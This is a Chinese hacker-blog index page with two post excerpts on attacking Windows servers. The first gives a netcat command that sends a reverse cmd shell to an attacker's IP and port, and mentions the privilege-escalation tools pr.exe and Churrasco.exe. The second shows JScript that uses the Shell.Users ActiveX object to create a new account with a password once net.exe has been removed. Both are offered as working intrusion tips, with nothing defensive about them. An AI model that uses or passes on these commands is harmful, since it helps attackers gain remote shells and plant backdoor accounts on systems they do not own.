天黑再动手

摘要： Cmd路径：c:\windows\temp\cmd.exeNc 也在同目录下，例如反弹cmdshell："c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"通常都不会成功。而直接在 cmd 路径上输入：c:\windows\temp\nc.exe命令输入：-vv ip 999 -e c:\windows\temp\cmd.exe却能成功。。这个不是重点我们通常执行 pr.exe 或 Churrasco.exe 的时候也需要按照上面的方法才能成功。 阅读全文

摘要： 今天研究了一下用户控制面板文件nusrmgr.cpl，发现调用的是Shell.Users来加用户，它还同时调用了wscript.shell、Shell.Application、Shell.LocalMachine这三个组件。不过加用户的话，这一个Shell.Users就足够了。那么可能在删掉了net.exe和不用adsi之外，这也可能是一种新的加用户的方法。代码如下：js:var o=new ActiveXObject( "Shell.Users" ); z=o.create("test") ;z.changePassword("123456& 阅读全文